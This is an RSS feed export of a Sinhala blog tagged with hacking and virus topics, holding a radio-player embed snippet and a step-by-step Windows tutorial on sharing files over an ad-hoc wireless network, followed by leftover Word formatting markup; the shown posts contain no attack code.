<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:gd="http://schemas.google.com/g/2005" xmlns:georss="http://www.georss.org/georss" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-3391098358149587733</atom:id><lastBuildDate>Fri, 01 Nov 2024 10:32:16 +0000</lastBuildDate><category>hacking</category><category>other</category><category>Programming</category><category>VB</category><category>Virus</category><title>PROGRAMME LK</title><description>Hacking,Virus,Programming Source Code</description><link>http://programmelk.blogspot.com/</link><managingEditor>noreply@blogger.com (Lahiru Dilranga Silva)</managingEditor><generator>Blogger</generator><openSearch:totalResults>18</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:image href="http://4.bp.blogspot.com/-nRpeGJ0Y7-w/T0-CGa9ZDvI/AAAAAAAAAjg/lkvqb1aW6sA/s1600/logo%2Bnew%2Bpng.png"/><itunes:subtitle>Hacking,Virus,Programming Source Code</itunes:subtitle><itunes:category text="Technology"><itunes:category text="Software How-To"/></itunes:category><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><xhtml:meta content="noindex" name="robots" xmlns:xhtml="http://www.w3.org/1999/xhtml"/><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-8945278396217557672</guid><pubDate>Fri, 20 Apr 2012 08:21:00 +0000</pubDate><atom:updated>2012-04-20T01:21:48.440-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">other</category><title>iRadioLK දැන් ඔබේ බ්ලොගයටත්</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB_J11dgC-QsafrmlvsuCv5PFjchnPPJVORwp91epjTxomqSDSdzxRh3KzcIwO-2pOWEcB0p842lvbS2zIihMmNfnAN0b5siw61nuBhUMRwMxhDkzL5ksehjXD86MlLEl__REYkhqbeykG/s1600/iradiolk.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB_J11dgC-QsafrmlvsuCv5PFjchnPPJVORwp91epjTxomqSDSdzxRh3KzcIwO-2pOWEcB0p842lvbS2zIihMmNfnAN0b5siw61nuBhUMRwMxhDkzL5ksehjXD86MlLEl__REYkhqbeykG/s200/iradiolk.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
ඔයාලගේ එක iRadioLK ඔන්ලයින් රේඩියො එකේ Player&amp;nbsp; එක දැන් ඔබේ බ්ලොගයටත් දැන් දාගන්න පුලුවන්.. ඔබේ බ්ලොගයේ සිටම iRadioLK ඇසන්නට දැන් හැකියාව ඇත.. එ සදහා පහත සදහන් Coding එක ඔබේ බ්ලොගයත දමන්න.. IRadioLK යනු ශ්‍රි ලංකා පැය 24 පුරාම විකාශනය වන ඔන්ලයින් වෙබ් රේඩියො එකකි.. iRadioLK පිළිබද වැඩි විස්තර සදහා පිවිසෙන්න &lt;a href="http://www.iradiolk.com/"&gt;www.iradiolk.com&lt;/a&gt; වෙත..&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style="text-align: center;"&gt;මෙන්න Coding එක&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt; &lt;form action="" id="form1" method="post" name="form1"&gt;&lt;label&gt;&lt;br /&gt;
&lt;textarea cols="50" name="textfield" rows="7"&gt;&amp;lt;center&amp;gt;&amp;lt;iframe src="http://www.ranga3ddesignlab.info/iradiolk/iradiolk.html" width="221" height="135"scrolling="no" frameborder="0" style="border: 0px none transparent;"&amp;gt;&amp;lt;/iframe&amp;gt;&amp;lt;/center&amp;gt;&lt;/textarea&gt;&lt;br /&gt;
&lt;/label&gt;&lt;/form&gt;&lt;/center&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;h3&gt;&lt;b&gt;Code එක දැම්මාම මෙහෙමයි මේක Preview වෙන්නේ..&lt;/b&gt;&lt;/h3&gt;&lt;h3&gt;&lt;center&gt;&lt;iframe frameborder="0" height="135" scrolling="no" src="http://www.ranga3ddesignlab.info/iradiolk/iradiolk.html" style="border: 0px none transparent;" width="221
  "&gt;&lt;/iframe&gt;&lt;/center&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/h3&gt;&lt;/div&gt;</description><link>http://programmelk.blogspot.com/2012/04/iradiolk.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB_J11dgC-QsafrmlvsuCv5PFjchnPPJVORwp91epjTxomqSDSdzxRh3KzcIwO-2pOWEcB0p842lvbS2zIihMmNfnAN0b5siw61nuBhUMRwMxhDkzL5ksehjXD86MlLEl__REYkhqbeykG/s72-c/iradiolk.jpg" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-8140319780491259039</guid><pubDate>Sat, 03 Mar 2012 03:16:00 +0000</pubDate><atom:updated>2012-03-02T19:16:19.650-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking</category><category domain="http://www.blogger.com/atom/ns#">other</category><title>File Sharing via Ad-Hoc Network</title><description>&lt;div class="post-content clear-block"&gt;               Hey Guys,&lt;br /&gt;
I found that sometimes we don’t have any media to share movies and  files with our friends. So I am going to tell you that how you can share  your movies and other files with friends. We will be doing this by  transfering files via Ad-Hoc Wireless Network.&lt;br /&gt;
&lt;strong&gt;1.&lt;/strong&gt; Go to Network And Sharing Center (&lt;strong&gt;  Control Panel -&amp;gt; Network And Internet -&amp;gt; Network and Sharing  Centre&lt;/strong&gt; )&lt;br /&gt;
&lt;strong&gt;2.&lt;/strong&gt; Click on ‘&lt;strong&gt;Set up a new connection or  network’&lt;/strong&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2042" height="117" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-1.png" title="fs-1" width="475" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;3.&lt;/strong&gt; Select last option &lt;strong&gt;“Set up a wireless ad  hoc (computer to computer) network” &lt;/strong&gt;and click Next.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;&lt;img alt="" class="aligncenter size-full 
wp-image-2043" height="85" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-2.png" title="fs-2" width="644" /&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;4.&lt;/strong&gt; Now enter the network name and security key for  your ad hoc network.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2044" height="225" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-3.png" title="fs-3" width="690" /&gt;&lt;br /&gt;
&lt;strong&gt;5.&lt;/strong&gt; Your ad hoc network has been created.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2045" height="418" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-4.png" title="fs-4" width="810" /&gt;&lt;strong&gt;6. &lt;/strong&gt;Now there will  be a wireless ad hoc network in your laptop displaying &lt;strong&gt;“Waiting  for Users”&lt;/strong&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2046" height="251" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-5.png" title="fs-5" width="492" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;7. &lt;/strong&gt;Same network will be showing in your friends  laptop.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2047" height="185" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-6.jpg" title="fs-6" width="244" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;8. &lt;/strong&gt;Connect to your wireless ad hoc network from your  friends laptop. When both of you get connected it will show &lt;strong&gt;connected&lt;/strong&gt;  in both the laptops.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2048" height="97" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-7.png" title="fs-7" width="268" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;9. &lt;/strong&gt;Now open &lt;strong&gt;“My Computer” &lt;/strong&gt;in your  friend’s laptop and click&amp;nbsp; on &lt;strong&gt;“Network”.&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2050" height="206" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-9.png" title="fs-9" width="226" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;10. &lt;/strong&gt;After click on &lt;strong&gt;Network&lt;/strong&gt;, it will  show computers presented in your wireless network.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2051" height="125" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-10.png" title="fs-10" width="670" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;11. &lt;/strong&gt;Now you can access files from here, but it will  ask for username and password for that computer.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2052" height="431" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-11.png" title="fs-11" width="653" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;12. &lt;/strong&gt;Now to stop asking for password, open &lt;strong&gt;“Network  and Sharing Center”&lt;/strong&gt; and click on &lt;strong&gt;“Change Advanced  Sharing Settings”. &lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2053" height="205" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-12.png" title="fs-12" width="193" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;13. &lt;/strong&gt;Now you need to turn off the &lt;strong&gt;Password  Protected Sharing&lt;/strong&gt;. Select &lt;strong&gt;“Home or Work (current  profile)”.&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2054" height="151" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-13.png" title="fs-13" width="622" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;14. &lt;/strong&gt;Now turn off &lt;strong&gt;Password Protected Sharing.&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2055" height="154" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-14.png" title="fs-14" width="580" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;15. &lt;/strong&gt;Sometimes your ad hoc network is treated as  Public Networks, in that case do same with Public Profile.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2056" height="148" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-15.png" title="fs-15" width="605" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;16. &lt;/strong&gt;Turn off &lt;strong&gt;Password Protected Sharing&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2057" height="143" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-16.png" title="fs-16" width="326" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;17. &lt;/strong&gt;Now you will be able to access the files without  username and passwords. But there will only be one shared folder with  the name of &lt;strong&gt;Users.&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2037" height="136" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-17.png" title="fs-17" width="346" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;18. &lt;/strong&gt;Now you need to share the folder on your laptop  to access it with your friends laptop. To do this goto the properties of  the folder &lt;strong&gt;(Right Click -&amp;gt; Properties)&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2038" height="530" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-18.png" title="fs-18" width="387" /&gt;&lt;br /&gt;
&lt;strong&gt;19. &lt;/strong&gt;Now go to &lt;strong&gt;“Sharing” &lt;/strong&gt;tab and  click on &lt;strong&gt;“Advanced Sharing”&lt;/strong&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2039" height="367" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-19.png" title="fs-19" width="374" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;20. &lt;/strong&gt;Now check mark &lt;strong&gt;“Share this folder” &lt;/strong&gt;and  click on &lt;strong&gt;“OK”.&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" class="aligncenter size-full 
wp-image-2040" height="358" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-20.png" title="fs-20" width="360" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;21. &lt;/strong&gt;Now your folder will be available in the network  and you can access the files. ENJOY…!!&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://kyrionhackingtutorials.com/2012/03/file-sharing-via-ad-hoc-network/fs-21/" rel="attachment wp-att-2041"&gt;&lt;img alt="" class="aligncenter size-full 
wp-image-2041" height="159" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/03/fs-21.png" title="fs-21" width="641" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;&lt;br /&gt;
&lt;w:WordDocument&gt;&lt;br /&gt;
&lt;w:View&gt;Normal&lt;/w:View&gt;&lt;br /&gt;
&lt;w:Zoom&gt;0&lt;/w:Zoom&gt;&lt;br /&gt;
&lt;w:TrackMoves/&gt;&lt;br /&gt;
&lt;w:TrackFormatting/&gt;&lt;br /&gt;
&lt;w:PunctuationKerning/&gt;&lt;br /&gt;
&lt;w:ValidateAgainstSchemas/&gt;&lt;br /&gt;
&lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;&lt;br /&gt;
&lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;&lt;br /&gt;
&lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;&lt;br /&gt;
&lt;w:DoNotPromoteQF/&gt;&lt;br /&gt;
&lt;w:LidThemeOther&gt;EN-US&lt;/w:LidThemeOther&gt;&lt;br /&gt;
&lt;w:LidThemeAsian&gt;X-NONE&lt;/w:LidThemeAsian&gt;&lt;br /&gt;
&lt;w:LidThemeComplexScript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;&lt;br /&gt;
&lt;w:Compatibility&gt;&lt;br /&gt;
&lt;w:BreakWrappedTables/&gt;&lt;br /&gt;
&lt;w:SnapToGridInCell/&gt;&lt;br /&gt;
&lt;w:WrapTextWithPunct/&gt;&lt;br /&gt;
&lt;w:UseAsianBreakRules/&gt;&lt;br /&gt;
&lt;w:DontGrowAutofit/&gt;&lt;br /&gt;
&lt;w:SplitPgBreakAndParaMark/&gt;&lt;br /&gt;
&lt;w:DontVertAlignCellWithSp/&gt;&lt;br /&gt;
&lt;w:DontBreakConstrainedForcedTables/&gt;&lt;br /&gt;
&lt;w:DontVertAlignInTxbx/&gt;&lt;br /&gt;
&lt;w:Word11KerningPairs/&gt;&lt;br /&gt;
&lt;w:CachedColBalance/&gt;&lt;br /&gt;
&lt;/w:Compatibility&gt;&lt;br /&gt;
&lt;m:mathPr&gt;&lt;br /&gt;
&lt;m:mathFont m:val="Cambria Math"/&gt;&lt;br /&gt;
&lt;m:brkBin m:val="before"/&gt;&lt;br /&gt;
&lt;m:brkBinSub m:val="&amp;#45;-"/&gt;&lt;br /&gt;
&lt;m:smallFrac m:val="off"/&gt;&lt;br /&gt;
&lt;m:dispDef/&gt;&lt;br /&gt;
&lt;m:lMargin m:val="0"/&gt;&lt;br /&gt;
&lt;m:rMargin m:val="0"/&gt;&lt;br /&gt;
&lt;m:defJc m:val="centerGroup"/&gt;&lt;br /&gt;
&lt;m:wrapIndent m:val="1440"/&gt;&lt;br /&gt;
&lt;m:intLim m:val="subSup"/&gt;&lt;br /&gt;
&lt;m:naryLim m:val="undOvr"/&gt;&lt;br /&gt;
&lt;/m:mathPr&gt;&lt;/w:WordDocument&gt;&lt;br /&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;&lt;br /&gt;
&lt;w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="39" Name="toc 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="39" Name="toc 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="39" Name="toc 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="39" Name="toc 4"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="39" Name="toc 5"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="39" Name="toc 6"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="39" Name="toc 7"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="39" Name="toc 8"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="39" Name="toc 9"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
